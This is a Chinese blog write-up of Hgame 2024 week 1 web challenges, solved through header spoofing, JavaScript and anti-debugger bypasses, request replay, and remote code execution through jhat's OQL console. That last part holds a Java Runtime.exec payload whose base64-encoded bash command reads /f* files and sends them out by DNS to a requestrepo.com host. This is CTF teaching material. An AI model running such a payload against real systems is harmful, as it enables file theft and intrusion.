<!--
	作者：Sariay
	时间：2018-08-26
	描述：There may be a bug, but don't worry, Qiling(器灵) says that it can work normally! aha!
-->
<!DOCTYPE html>
<html class="html-loading">
		

<head>
	<meta charset="utf-8">
  <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
	<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1.0, user-scalable=no">
  <title>
    
      Hgame 2024 week 1 | Infernity&#39;s Blog
    
  </title>
  <meta name="author" content="Infernity">
  <meta name="keywords" content="" />
  <meta name="description" content="blog" />
	<!-- favicon -->
  <link rel="shortcut icon" href="/img/I.png">

  <!-- css -->
  
<link rel="stylesheet" href="/css/Annie.css">

  
  <!-- jquery -->
	
<script src="/plugin/jquery/jquery.min.js"></script>


<script>
    const CONFIG_BGIMAGE = {
      mode: 'random_you',
      normalSrc: '/img/header-bg.jpg',
      randomYouMax: 59,
      randomYouSrc: '/img/background/',
	  randomOtherSrc: 'https://api.berryapi.net/?service=App.Bing.Images&day=-0',
	  preloaderEnable: true
    }
	
    const CONFIG_LEACLOUD_COUNT = {
      enable: true,
	  appId: 'AU8',
	  appKey: '4cU',
	  serverURLs: 'http' || ' '
    }
  </script>
<meta name="generator" content="Hexo 6.3.0"></head>
	<body>
		<!-- Preloader -->

	<div id="preloader">
		<div class="pre-container">
			
				<div class="spinner">
					<div class="double-bounce1"></div>
					<div class="double-bounce2"></div>
				</div>
						
		</div>
	</div>


<!-- header -->
<header class="fixbackground bg-pan-br">
	<div class="mask">
		<!-- motto -->
		<div class="h-body">	
			
				<div class="motto text-shadow-pop-left">
					<p class="content" id="motto-content">获取中...</p>
					<p>-<p>
					<p class="author" id="motto-author">Just a minute...</p>
				</div>
			
		</div>
		
		<!-- others: such as time... -->			
		<div class="h-footer">
			<a href="javascript:;" id="read-more" class="scroll-down">
				<span class="icon-anchor1 animation-scroll-down"></span>
			</a>
		</div>
	</div>
</header>

<div id="navigation-hide">
	<!-- Progress bar -->
	<div id="progress-bar"></div>

	<!-- Progress percent -->
	<div id="progress-percentage"><span>0.0%</span></div>

	<div class="toc-switch"><span class="switch-button">目录</span></div>

	<!-- Page title -->
	<p>
		
			「Hgame 2024 week 1」
		
	</p>

	
	
		<span id="star-button" rel="unlike">
			<i class="icon-heart"></i>
		</span>
	

	<!-- Nav trigger for navigation-H-->
	<a class="nav-trigger"><span></span></a>
</div>

<!-- Navigation in div(id="navigation-H") -->
<nav class="nav-container" id="cd-nav">
	<div class="nav-header">
		<span class="logo"> 
			<img src="/img/logo.png">
		</span>
		<a href="javascript:;" class="nav-close"></a>
	</div>
	
	<div class="nav-body">
		<ul id="global-nav">
	
		<li class="menu-home">
			<a href="/" class="menu-item-home" target="_blank">主页</a>
		</li>
		
	
		<li class="menu-archive">
			<a href="/archives" class="menu-item-archive" target="_blank">归档</a>
		</li>
		
	
		<li class="menu-categories">
			<a href="/categories" class="menu-item-categories" target="_blank">分类</a>
		</li>
		
	
		<li class="menu-tags">
			<a href="/tags" class="menu-item-tags" target="_blank">标签</a>
		</li>
		
	
		<li class="menu-Friends!">
			<a href="/friends" class="menu-item-Friends!" target="_blank">Friends!</a>
		</li>
		
	
		<li class="menu-gallery">
			<a href="/gallery" class="menu-item-gallery" target="_blank">相册</a>
		</li>
		
	

	
</ul>
	</div>
	
	<div class="nav-footer">
		<ul id="global-social">
	
		<li>
			<a href="http://github.com/" target="_blank">
				<span class="icon-one"><span class="path1"></span><span class="path2"></span></span>
			</a>
		</li>
	
		<li>
			<a href="/img/qq.png" target="_blank">
				<span class="icon-qq"></span>
			</a>
		</li>
	
		<li>
			<a href="https://github.com/CyberPunk-Infernity" target="_blank">
				<span class="icon-github"></span>
			</a>
		</li>
	
		<li>
			<a href="/img/weixin.jpg" target="_blank">
				<span class="icon-weixin"></span>
			</a>
		</li>
	
		<li>
			<a href="https://blog.csdn.net/qq_39591427?spm=1000.2115.3001.5343" target="_blank">
				<span class="icon-csdn"></span>
			</a>
		</li>
	
		<li>
			<a href="http://github.com/" target="_blank">
				<span class="icon-instagram"></span>
			</a>
		</li>
	
		<li>
			<a href="http://github.com/" target="_blank">
				<span class="icon-twitter"></span>
			</a>
		</li>
	
		<li>
			<a href="/atom.xml" target="_blank">
				<span class="icon-rss"></span>
			</a>
		</li>
			
</ul>

	</div>
</nav>
			
		<!--main-->
		<main>
			<!--
	时间：2018-11-17
	描述：
		插件名称：katelog.min.js
		插件作者：KELEN
		插件来源: https://github.com/KELEN/katelog
-->

	
		<div class="layout-toc">
			<div id="layout-toc">
				<div class="k-catelog-list" id="catelog-list" data-title="文章目录"></div>
			</div>
		</div>

		
<script src="/plugin/toc/katelog.min.js"></script>


		
	 

<div class="layout-post">
	<div id="layout-post">
		<div class="article-title">
			
	<a href="/2024/01/31/Hgame%202024%20week%201/" itemprop="url">
		Hgame 2024 week 1
	</a>

		</div>

		<div class="article-meta">
			<span>
				<i class="icon-calendar1"></i>
				
				




	更新于

	<a href="/2024/01/31/Hgame%202024%20week%201/" itemprop="url">
		<time datetime="2024-01-31T07:19:35.000Z" itemprop="dateUpdated">
	  		2024-06-18
	  </time>
	</a> 



			</span>
			<span>
				
	<i class="icon-price-tags"></i>
	
		<a href="/tags/WPs/" class=" ">
			WPs
		</a>
	
		
			</span>
			
			

	
    <span class="leancloud_visitors" id="/2024/01/31/Hgame%202024%20week%201/_visitors" data-url="/2024/01/31/Hgame%202024%20week%201/" data-title="Hgame 2024 week 1">
       	<i class="icon-eye"></i>
       	热度
        
            <i class="leancloud_visitors_count" id="leancloud_visitors_count">1</i>
                   
    </span>
    



	
    <span class="leancloud_likes" id="/2024/01/31/Hgame%202024%20week%201/_likes" data-url="/2024/01/31/Hgame%202024%20week%201/" data-title="Hgame 2024 week 1" rel="unlike">
        <i class="icon-heart"></i>
        喜欢
        <i class="leancloud_likes_count" id="leancloud_likes_count">0</i>
    </span>
	

		</div>

		<div class="article-content" id="article-content">
			<p>by:Infernity</p>
<h1 id="ezHTTP"><a href="#ezHTTP" class="headerlink" title="ezHTTP"></a>ezHTTP</h1><p>请从vidar.club访问这个页面</p>
<p>在请求头中插入</p>
<p>referer:vidar.club</p>
<p>请通过Mozilla&#x2F;5.0 (Vidar; VidarOS x86_64) AppleWebKit&#x2F;537.36 (KHTML, like Gecko) Chrome&#x2F;121.0.0.0 Safari&#x2F;537.36 Edg&#x2F;121.0.0.0访问此页面</p>
<p>明显的UA头，修改UA头为以上。</p>
<p>请从本地访问这个页面</p>
<p>本地访问不止X-Forwarded-For一个头，有很多种，这里是X-Real-IP:127.0.0.1</p>
<p>最后拿到一串字符串</p>
<p>eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJGMTRnIjoiaGdhbWV7SFRUUF8hc18xbVAwclQ0bnR9In0.VKMdRQllG61JTReFhmbcfIdq7MvJDncYpjaT7zttEDc</p>
<p>base64解密后拿到flag</p>
<p><strong>hgame{HTTP_!s_1mP0rT4nt}</strong></p>
<p>当然这里不是base64，但是对于拿到flag来说，base64解密已经够了。解密时记得去掉点号。</p>
<p><img src="/img/Hgame_2024/1.png" alt="图片.png"></p>
<h1 id="Bypass-it"><a href="#Bypass-it" class="headerlink" title="Bypass it"></a>Bypass it</h1><p>一个登录注册题，但是不让我注册</p>
<p><img src="/img/Hgame_2024/2.png" alt="图片.png"></p>
<p>弹窗一看就是JavaScript弄的，但是为了严谨，查看源码，注册那里有个&#x2F;register_page.php</p>
<p><img src="/img/Hgame_2024/3.png" alt="图片.png"></p>
<p>点进去发现这样一段代码</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;script language=<span class="string">&#x27;javascript&#x27;</span> defer&gt;<span class="title function_">alert</span>(<span class="string">&#x27;很抱歉，当前不允许注册&#x27;</span>);top.<span class="property">location</span>.<span class="property">href</span>=<span class="string">&#x27;login.html&#x27;</span>&lt;/script&gt;</span><br></pre></td></tr></table></figure>

<p>这段代码是直接弹个窗，然后重定向到Login页面。那么好，直接禁用js就可以了，关于哪个浏览器如何禁用js这里不再赘述。</p>
<p>禁用后，就可以注册了，注册后退回到login界面，登录后一片白，但是看源码发现这里也是通过js重定向到userIndex.php页面，但是我们禁用了JS，这里就不会跳转，那我们就手动跳转入userIndex.php，进去后点击click here 拿到flag</p>
<p> <strong>hgame{5ca7e8897ddd8913d4d1fcba65e55acf7cfa8827}</strong></p>
<h1 id="SeleSelect-Courses"><a href="#SeleSelect-Courses" class="headerlink" title="SeleSelect Courses"></a><strong>SeleSelect Courses</strong></h1><p>这道题我不知道是哪来的什么提示或者是在考啥。进入后抓取选课的包，重复发同一个包<strong>几千遍</strong>，就会有一次选上，重复这个流程，直到五个都被选上，我这里是用burp发包的，写脚本亦可。</p>
<p><img src="/img/Hgame_2024/4.png" alt="图片.png"></p>
<p>五个都选上后拿到flag</p>
<p><img src="/img/Hgame_2024/5.png" alt="图片.png"></p>
<p><strong>begin{WELCOMe_to_B3GinCTF_2024_H0Pe_YOU_wiL1_11ke_i7}</strong></p>
<h1 id="2048-16"><a href="#2048-16" class="headerlink" title="2048*16"></a><strong>2048*16</strong></h1><p>这里首先的难点是我们明知道是JS游戏题，想要去调试，修改变量直接获取胜利，但是这里首先ban掉了F12和鼠标右键，还有ctrl+U这些不让我们看源码和调试，这个是JS做到的，所以我们还是直接禁用JS就可以打开调试工具了。</p>
<p>新的问题来了，这里JS关闭后，游戏不会正常启动，调试工具倒是打开了，那么这里利用浏览器的性质，打开F12后刷新也会保留F12。所以我们这里再打开JS刷新页面即可。</p>
<p><img src="/img/Hgame_2024/6.png" alt="图片.png"></p>
<p>新的问题来了，这里触发了JS反调试，无限debugger，这样是无法调试的，我们需要反 反调试。</p>
<p><a target="_blank" rel="noopener" href="https://blog.csdn.net/wxtcstt/article/details/129906561">https://blog.csdn.net/wxtcstt/article/details/129906561</a></p>
<p>在控制台里按以下方法输入：</p>
<ol>
<li>打开F12点击Console</li>
<li>输入(function(){}).constructor &#x3D;&#x3D;&#x3D; Function，回车；</li>
<li>如果返回的是true，继续输入Function.prototype.constructor &#x3D; function(){},并回车；</li>
<li>切换回sources选项卡,点击继续执行，无限debugger的问题就解决了</li>
</ol>
<p><img src="/img/Hgame_2024/7.png" alt="图片.png"></p>
<p>这里第一步我们就解决了，可以调试了，但是这道题把分数变量藏得很深，不能直接通过修改分数来达成目的。</p>
<p>我们搜索won，把断点打在1207行，这里明显是判断胜负的地方，那么，我们继续故意输掉游戏，让游戏卡在断点处。</p>
<p><img src="/img/Hgame_2024/8.png" alt="图片.png"></p>
<p>输掉游戏后，我们逐步跟进</p>
<p><img src="/img/Hgame_2024/9.png" alt="图片.png"></p>
<p>差不多五六步之后，出现了这样一个变量</p>
<p><img src="/img/Hgame_2024/10.png" alt="图片.png"></p>
<p>很明显了，我们在控制台处输入x&#x3D;true</p>
<p>然后放开调试，让程序正常运行，拿到flag</p>
<p><img src="/img/Hgame_2024/11.png" alt="图片.png"></p>
<p><strong>flag{b99b820f-934d-44d4-93df-41361df7df2d}</strong></p>
<h1 id="jhat"><a href="#jhat" class="headerlink" title="jhat"></a><strong>jhat</strong></h1><p><strong>提示1</strong>hint1: need rce</p>
<p><strong>提示2</strong>hint2: focus on oql</p>
<p><strong>提示3</strong>hint3: 题目不出网 想办法拿到执行结果</p>
<p>提示已经给的很全面了，打开环境后，进入OQL，即Object Query Language (OQL) query</p>
<p>然后要在这个框框里打payload进行rce，java题通用的rce payload为</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">java.lang.Runtime.getRuntime().exec(<span class="string">&quot;payload&quot;</span>)</span><br></pre></td></tr></table></figure>

<p>那么题目不出网，老方法，DNSlog外带。该方法在week2里已经写过，这里不再赘述。</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">java.lang.Runtime.getRuntime().exec(<span class="string">&quot;bash -c &#123;echo,Y3VybCBgY2F0IC9mKmAuM2p1c2V2NTUucmVxdWVzdHJlcG8uY29t&#125;|&#123;base64,-d&#125;|&#123;bash,-i&#125;&quot;</span>)</span><br></pre></td></tr></table></figure>

<p><img src="/img/Hgame_2024/12.png" alt="图片.png"></p>
<p><strong>hgame{c000110cc71ea5a1e5b4366597038d8855af5a0f}</strong></p>
	
		</div>
		
		<div id="current-post-cover" data-scr="/img/Hgame_2024/HgameCTF2024.png"></div>

		<!-- relate post, comment...-->
		<div class="investment-container">
			<div class="investment-header">
				<div class="investment-title-1">
					<div class="on">相关文章</div>
					<div>评论</div>
					<div>分享</div>
				</div>
				<div class="investment-title-2">	            
					
	<span>
		<a id="totop-post-page">返回顶部</a>
		
			<a href="/2024/02/05/Begin-CTF-2024/" title="Begin CTF 2024" rel="prev">
				&laquo;上一篇
			</a>
		
		
			<a href="/2023/11/28/GeekChallenge%202023%20WEB%E8%B5%9B%E9%A2%98WP/" title="GeekChallenge 2023 WEB赛题目WP" rel="next">
				下一篇&raquo;
			</a>
			
	</span>


      		
				</div>	
			</div>
			
			<div class="investment-content">
				<div class="investment-content-list">
					

<div class="relate-post">
	
		<ul>
			
					<li>
						<div class="relate-post-text">
							<a class="relate-post-title" href="/2025/01/14/SUCTF2025/" title="SUCTF 2025 WEB部分wp">
								SUCTF 2025 WEB部分wp			
							</a>
							<p class="relate-post-date">
								<i class="fa fa-calendar"></i>
								一月 14日, 2025				
							</p>
							<p class="relate-post-content">
								SU_photogallery
尝试源码泄露 https://www.cnblogs.com/Kawakaze777/p/17799235.html![e0dcf5e1-a150-4c37-bd6e-bf45ea40a99b](img...
							</p>
						</div>

						<div class="relate-post-cover">
							<a href="/2025/01/14/SUCTF2025/" title="SUCTF 2025 WEB部分wp">				
								
								<img class="lazy" src="/img/lazy.gif" data-src="/img/SUCTF2025/SUCTF2025.jpg" alt="SUCTF 2025 WEB部分wp"/>
							</a>
						</div>
					</li>												
			
					<li>
						<div class="relate-post-text">
							<a class="relate-post-title" href="/2024/11/09/2024%E9%B9%8F%E5%9F%8E%E6%9D%AFweb%E5%85%A8wp/" title="2024鹏城杯web全wp">
								2024鹏城杯web全wp			
							</a>
							<p class="relate-post-date">
								<i class="fa fa-calendar"></i>
								十一月 9日, 2024				
							</p>
							<p class="relate-post-content">
								python口算-pcb2024123456789101112131415161718192021222324import requestsimport reurl = &quot;http://192.168.18.28&quot;...
							</p>
						</div>

						<div class="relate-post-cover">
							<a href="/2024/11/09/2024%E9%B9%8F%E5%9F%8E%E6%9D%AFweb%E5%85%A8wp/" title="2024鹏城杯web全wp">				
								
								<img class="lazy" src="/img/lazy.gif" data-src="/img/background/5.jpg" alt="2024鹏城杯web全wp"/>
							</a>
						</div>
					</li>												
			
					<li>
						<div class="relate-post-text">
							<a class="relate-post-title" href="/2024/11/03/%E5%BC%BA%E7%BD%91%E6%9D%AF2024/" title="强网杯2024">
								强网杯2024			
							</a>
							<p class="relate-post-date">
								<i class="fa fa-calendar"></i>
								十一月 3日, 2024				
							</p>
							<p class="relate-post-content">
								PyBlockly黑名单过滤了所有符号，只能在print里用字母和数字，
1234if check_for_blacklisted_symbols(block[&#x27;fields&#x27;][&#x27;TEXT&#x27;]...
							</p>
						</div>

						<div class="relate-post-cover">
							<a href="/2024/11/03/%E5%BC%BA%E7%BD%91%E6%9D%AF2024/" title="强网杯2024">				
								
								<img class="lazy" src="/img/lazy.gif" data-src="/img/qwb2024/qwb2024.png" alt="强网杯2024"/>
							</a>
						</div>
					</li>												
			
					<li>
						<div class="relate-post-text">
							<a class="relate-post-title" href="/2024/10/07/SCTF2024/" title="SCTF2024 ezRender">
								SCTF2024 ezRender			
							</a>
							<p class="relate-post-date">
								<i class="fa fa-calendar"></i>
								十月 7日, 2024				
							</p>
							<p class="relate-post-content">
								ezRender这道题主要是成为admin，要成为admin就要伪造cookie，要伪造cookie就要获取jwt密钥。
jwt密钥生成逻辑：
123456789101112131415161718192021import timec...
							</p>
						</div>

						<div class="relate-post-cover">
							<a href="/2024/10/07/SCTF2024/" title="SCTF2024 ezRender">				
								
								<img class="lazy" src="/img/lazy.gif" data-src="/img/SCTF2024/SCTF2024.jpg" alt="SCTF2024 ezRender"/>
							</a>
						</div>
					</li>												
			
					<li>
						<div class="relate-post-text">
							<a class="relate-post-title" href="/2024/09/21/ByteCTF2024%E5%A4%A7%E5%B8%88%E8%B5%9B/" title="ByteCTF2024大师赛web部分wp">
								ByteCTF2024大师赛web部分wp			
							</a>
							<p class="relate-post-date">
								<i class="fa fa-calendar"></i>
								九月 21日, 2024				
							</p>
							<p class="relate-post-content">
								ezobj源码：
12345678910111213141516171819&lt;?phpini_set(&quot;display_errors&quot;, &quot;On&quot;);include_once(&quot;...
							</p>
						</div>

						<div class="relate-post-cover">
							<a href="/2024/09/21/ByteCTF2024%E5%A4%A7%E5%B8%88%E8%B5%9B/" title="ByteCTF2024大师赛web部分wp">				
								
								<img class="lazy" src="/img/lazy.gif" data-src="/img/2024bytectf/bytectf.png" alt="ByteCTF2024大师赛web部分wp"/>
							</a>
						</div>
					</li>												
			
					<li>
						<div class="relate-post-text">
							<a class="relate-post-title" href="/2024/09/08/%E7%AC%AC%E5%9B%9B%E5%B1%8A%E9%95%BF%E5%9F%8E%E6%9D%AFweb%E5%85%A8%E9%A2%98%E8%A7%A3/" title="第四届长城杯web全题解">
								第四届长城杯web全题解			
							</a>
							<p class="relate-post-date">
								<i class="fa fa-calendar"></i>
								九月 8日, 2024				
							</p>
							<p class="relate-post-content">
								WEB
SQLUS



猜测账户是admin密码是任意一个字符
登录进去后头像那边，可以上传文件，但是文件名里不能有p，尝试传入.htaccess然后传入一个txt当做php执行。



在头像前端看到了上传路径


flag没有权...
							</p>
						</div>

						<div class="relate-post-cover">
							<a href="/2024/09/08/%E7%AC%AC%E5%9B%9B%E5%B1%8A%E9%95%BF%E5%9F%8E%E6%9D%AFweb%E5%85%A8%E9%A2%98%E8%A7%A3/" title="第四届长城杯web全题解">				
								
								<img class="lazy" src="/img/lazy.gif" data-src="/img/第四届长城杯/ccb.png" alt="第四届长城杯web全题解"/>
							</a>
						</div>
					</li>												
			
					<li>
						<div class="relate-post-text">
							<a class="relate-post-title" href="/2024/08/25/NepCTF2024%E9%83%A8%E5%88%86web/" title="NepCTF2024部分web">
								NepCTF2024部分web			
							</a>
							<p class="relate-post-date">
								<i class="fa fa-calendar"></i>
								八月 25日, 2024				
							</p>
							<p class="relate-post-content">
								NepDouble代码过长这里不贴了，看到上传压缩包的第一反应是做一个链接到&#x2F;flag的软连接，上传上去解压就可以看到flag了，但是这里
12if os.path.islink(new_file):    return &...
							</p>
						</div>

						<div class="relate-post-cover">
							<a href="/2024/08/25/NepCTF2024%E9%83%A8%E5%88%86web/" title="NepCTF2024部分web">				
								
								<img class="lazy" src="/img/lazy.gif" data-src="/img/nepctf2024/nepctf2024.png" alt="NepCTF2024部分web"/>
							</a>
						</div>
					</li>												
			
					<li>
						<div class="relate-post-text">
							<a class="relate-post-title" href="/2024/08/25/2024%E7%AC%AC%E4%B8%83%E5%B1%8A%E5%B7%85%E5%B3%B0%E6%9E%81%E5%AE%A2%E9%83%A8%E5%88%86wp/" title="2024第七届巅峰极客部分wp">
								2024第七届巅峰极客部分wp			
							</a>
							<p class="relate-post-date">
								<i class="fa fa-calendar"></i>
								八月 25日, 2024				
							</p>
							<p class="relate-post-content">
								GoldenHornKing源码给了是很明显的ssti，在&#x2F;calc路由里传参calc_req，黑名单是不能有：数字、百分号、非ascii之外的字符。最烦的是这个access，原本是False，可以不用管，但是一旦成功执行一...
							</p>
						</div>

						<div class="relate-post-cover">
							<a href="/2024/08/25/2024%E7%AC%AC%E4%B8%83%E5%B1%8A%E5%B7%85%E5%B3%B0%E6%9E%81%E5%AE%A2%E9%83%A8%E5%88%86wp/" title="2024第七届巅峰极客部分wp">				
								
								<img class="lazy" src="/img/lazy.gif" data-src="/img/dfjk/dfjk.png" alt="2024第七届巅峰极客部分wp"/>
							</a>
						</div>
					</li>												
			
					<li>
						<div class="relate-post-text">
							<a class="relate-post-title" href="/2024/07/06/2024%E6%98%A5%E7%A7%8B%E6%9D%AF/" title="2024春秋杯部分wp">
								2024春秋杯部分wp			
							</a>
							<p class="relate-post-date">
								<i class="fa fa-calendar"></i>
								七月 6日, 2024				
							</p>
							<p class="relate-post-content">
								brother打开题目是?name&#x3D;hello，还回显了hello，看一下后台语言和框架

一眼ssti模版注入，
1?name=&#123;&#123;g.pop.__globals__.__builtins__.__im...
							</p>
						</div>

						<div class="relate-post-cover">
							<a href="/2024/07/06/2024%E6%98%A5%E7%A7%8B%E6%9D%AF/" title="2024春秋杯部分wp">				
								
								<img class="lazy" src="/img/lazy.gif" data-src="/img/2024春秋杯/2024春秋杯.png" alt="2024春秋杯部分wp"/>
							</a>
						</div>
					</li>												
			
					<li>
						<div class="relate-post-text">
							<a class="relate-post-title" href="/2024/06/10/PolarCTF2024%E5%A4%8F%E5%AD%A3%E4%B8%AA%E4%BA%BA%E6%8C%91%E6%88%98%E8%B5%9Bwp/" title="PolarCTF2024夏季个人挑战赛全wp">
								PolarCTF2024夏季个人挑战赛全wp			
							</a>
							<p class="relate-post-date">
								<i class="fa fa-calendar"></i>
								六月 10日, 2024				
							</p>
							<p class="relate-post-content">
								扫扫看不用扫，猜测是flag.php


flag{094c9cc14068a7d18ccd0dd3606e532f}

debudaoflag在cookie里：


flag{72077a55w312584wb1aaa88888cd...
							</p>
						</div>

						<div class="relate-post-cover">
							<a href="/2024/06/10/PolarCTF2024%E5%A4%8F%E5%AD%A3%E4%B8%AA%E4%BA%BA%E6%8C%91%E6%88%98%E8%B5%9Bwp/" title="PolarCTF2024夏季个人挑战赛全wp">				
								
								<img class="lazy" src="/img/lazy.gif" data-src="/img/PolarCTF2024春季个人挑战赛wp/polarctf.png" alt="PolarCTF2024夏季个人挑战赛全wp"/>
							</a>
						</div>
					</li>												
			
		</ul>
	
</div>	
				</div>
				<div class="investment-content-list">
					<div class="layout-comment">

	

		

			<!-- gitalk comment -->
			<!-- show gitalk comment -->
<div id="gitalk-container"></div>

<!-- gitalk`s css & js -->
<link rel="stylesheet" href="https://unpkg.com/gitalk/dist/gitalk.css">
<link rel="stylesheet" href="/css/comment.css">
<script src="https://cdn.bootcss.com/blueimp-md5/2.10.0/js/md5.min.js"></script>
<script src="https://unpkg.com/gitalk/dist/gitalk.min.js"></script>

<script type="text/javascript">

	(function gitalkComment(){
		//Thanks O-R
		//https://github.com/gitalk/gitalk/issues/102#issuecomment-382970552
		//去除尾部匹配正则数组的字符串  
		//Remove redundant characters
		String.prototype.trimEnd = function(regStr) {
			let result = this;
			if(regStr == undefined || regStr == null || regStr == "") {
				return result;
			}
			let array = regStr.split(',');

			if(array.length > 0) {

				let c = array.shift(), 
					str = this,
					i = str.length,
					rg = new RegExp(c),
					matchArr = str.match(rg);

				if(matchArr != undefined && matchArr != null && matchArr.length > 0) {
					let matchStr = matchArr[0].replace(/\\/g, "\\\\").replace(/\*/g, "\\*")
						.replace(/\+/g, "\\+").replace(/\|/g, "\\|")
						.replace(/\{/g, "\\{").replace(/\}/g, "\\}")
						.replace(/\(/g, "\\(").replace(/\)/g, "\\)")
						.replace(/\^/g, "\\^").replace(/\$/g, "\\$")
						.replace(/\[/g, "\\[").replace(/\]/g, "\\]")
						.replace(/\?/g, "\\?").replace(/\,/g, "\\,")
						.replace(/\./g, "\\.").replace(/\&/g, "\\&");
					matchStr = matchStr + '$';
					result = str.replace(new RegExp(matchStr), "");
				}

				if(array.length > 0) {
					return result.trimEnd(array.join())
				} else {
					return result;
				}
			}
		};

		//Create gitalk
		let gitalk = new Gitalk({
			clientID: '333--',
			clientSecret: '333--',
			//id: window.location.pathname,
			//id: decodeURI(window.location.pathname),
			//id: (window.location.pathname).split("/").pop().substring(0, 49),
			id: decodeURI( md5( location.href.trimEnd('#.*$,\\?.*$,index.html$') ) ),
			repo: 'annie-gitalk',
			owner: 'Sariay',
			admin: 'Sariay',
			distractionFreeMode: 'true',
		})
		gitalk.render('gitalk-container');		
	})();
</script>

		
		
	

</div>
				</div>
				<div class="investment-content-list">
					<div class="layout-share">
	
	

		
			
			<!-- socialShare share -->
			<div class="social-share"></div>

<!--  css & js -->
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/social-share.js/1.0.16/css/share.min.css">
<script async src="https://cdnjs.cloudflare.com/ajax/libs/social-share.js/1.0.16/js/social-share.min.js"></script>
			
		
		
	
</div>


				</div>
			</div>	
		</div>
	</div>
</div>

<!-- show math formula -->



	 
	
<script src="/plugin/clipboard/clipboard.js"></script>

	<script>
		// Copy code !
	    function preprocessing() {
	        $("#article-content .highlight").each(function() {
	            $(this).wrap('<div id="post-code"></div>');
	        })

	        $("#article-content #post-code").each(function() {
	            $(this).prepend('<nav class="copy-nav"><span><i class="code-language"></i></span></nav>');
	        })

	        $("#article-content .copy-nav").each(function() {
	            let languageClass = $(this).next().attr('class'),
	                language = ((languageClass.length > 9) && (languageClass != null)) ? languageClass.substr(10) : "none"; //why 9? Need to check language?

	            $(this).find('.code-language').text(language);
	            $(this).append('<span class="copy-btn icon-paste"></span>');
	        });
	    }

		function copy() {
		    $('#article-content #post-code').each(function(i) {
		        let codeCopyId = 'codeCopy-' + i;

		        let codeNode = $(this).find('.code'),
		            copyButton = $(this).find('.copy-btn');

		        codeNode.attr('id', codeCopyId);
		        copyButton.attr('data-clipboard-target-id', codeCopyId);
		    })
   
			let clipboard = new ClipboardJS('.copy-btn', {
					target: function(trigger) {
						return document.getElementById(trigger.getAttribute('data-clipboard-target-id'));
					}
		      	});

			//pure js
			function showTooltip(elem, msg) {		   
				elem.setAttribute('aria-label', msg);
				elem.setAttribute('class', 'copy-btn icon-clipboard1');
				setTimeout(function() {
					elem.setAttribute('class', 'copy-btn icon-paste');
				}, 2000);
			}

			clipboard.on('success', function(e) {
			    e.clearSelection();
			    console.info('Action:', e.action);		   
			    console.info('Trigger:', e.trigger);
			    showTooltip(e.trigger, 'Copied!');   
			});
			
			clipboard.on('error', function(e) {
			    console.error('Action:', e.action);
			    console.error('Trigger:', e.trigger);
			});
		}
		
		(function copyCode(){
			if ($('.layout-post').length) {
			    preprocessing();
			    copy();
			} 
		})();
	</script>






<link rel="stylesheet" href="/plugin/fancybox/jquery.fancybox.css">


<script src="/plugin/fancybox/jquery.fancybox.js"></script>


<script type="text/javascript">
	(function gallerySet(){
		let titleID = $('.article-title a'),
			imageID = $('.article-content img'),
			videoID = $('.article-content video');
		
		let postTitle = titleID.text() ? titleID.text() : "No post title!";
		
		imageID.each(function() {
			let imgPath = $(this).attr('src'),
				imgTitle = $(this).attr('alt') ? $(this).attr('alt') : "No image description!";
		
			//给每个匹配的<img>元素打包, 即添加父元素<a>
			$(this).wrap('<a data-fancybox="gallery" data-caption="《 ' + postTitle + ' 》' + imgTitle + '"href="' + imgPath + '"> </a>');
		});
		
		videoID.each(function() {
			let videoPath = $(this).attr('src');
		
			//给每个匹配的<img>元素打包, 即添加父元素<a>
			$(this).wrap('<a data-fancybox href=" ' + videoPath + ' "> </a>');
		});
		
		//TODO：支持html5 video

		if($('#layout-post').length) {
			$('[data-fancybox="gallery"]').fancybox({
				loop: true,
				buttons: [
					"zoom",
					"share",
					"slideShow",
					"fullScreen",
					//"download",
					"thumbs",
					"close"
				],
				protect: true
			});
		}
	})();
</script>
		</main>

		<!--footer-->
		<footer>
	<div id="navigation-show">
		<ul id="global-nav">
	
		<li class="menu-home">
			<a href="/" class="menu-item-home" target="_blank">主页</a>
		</li>
		
	
		<li class="menu-archive">
			<a href="/archives" class="menu-item-archive" target="_blank">归档</a>
		</li>
		
	
		<li class="menu-categories">
			<a href="/categories" class="menu-item-categories" target="_blank">分类</a>
		</li>
		
	
		<li class="menu-tags">
			<a href="/tags" class="menu-item-tags" target="_blank">标签</a>
		</li>
		
	
		<li class="menu-Friends!">
			<a href="/friends" class="menu-item-Friends!" target="_blank">Friends!</a>
		</li>
		
	
		<li class="menu-gallery">
			<a href="/gallery" class="menu-item-gallery" target="_blank">相册</a>
		</li>
		
	

	
</ul>
	</div>

	<div class="copyright">
		<p>
			 
				&copy;2024 - 2025, content by Infernity. All Rights Reserved.
			
			
				<a href="http://hexo.io/" title="Hexo" target="_blank" rel="noopener">Hexo</a> Theme <a href="https://github.com/Sariay/hexo-theme-Annie" title="Annie" target="_blank" rel="noopener">Annie</a> by Sariay.
			
		</p>
		<p>
			

	<!-- busuanzi -->
	<!-- busuanzi -->

		
	<script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
	

		<span id="busuanzi_container_page_pv">
	  		本文总阅读量<span id="busuanzi_value_page_pv"></span>次
		</span>

	




			<a href="javascript:zh_tran('s');" class="zh_click" id="zh_click_s">简体</a> 
			<a href="javascript:zh_tran('t');" class="zh_click" id="zh_click_t">繁體</a>				
		</p>
	</div>		
</footer>
		
	<!-- Local or hitokoto! -->

	
<script src="/plugin/motto/motto.js"></script>

	
	<script type="text/javascript">
		(function motto(){
			let mottoText = getMingYanContent().split('</br> - </br>'),
			
			mottoTextContent = mottoText[0]?mottoText[0]:'请刷新...',
			
			mottoTextFrom = mottoText[1]?mottoText[1]:'one/一个';
			
			mottoTextContent = mottoTextContent.trim().substring(0, 100);
		
			$("#motto-content").html( mottoTextContent);
			$("#motto-author").html( mottoTextFrom  );
		})();	
	</script>	



<!-- love effect -->

	
<script src="/plugin/love/love.js"></script>



<!-- back to top -->

	<div id="totop">
	<span class="icon-circle-up"></span>
</div>



<!-- site analysis -->


	<!-- site-analysis -->
	
	
	
	
	
 

<!-- leancloud -->


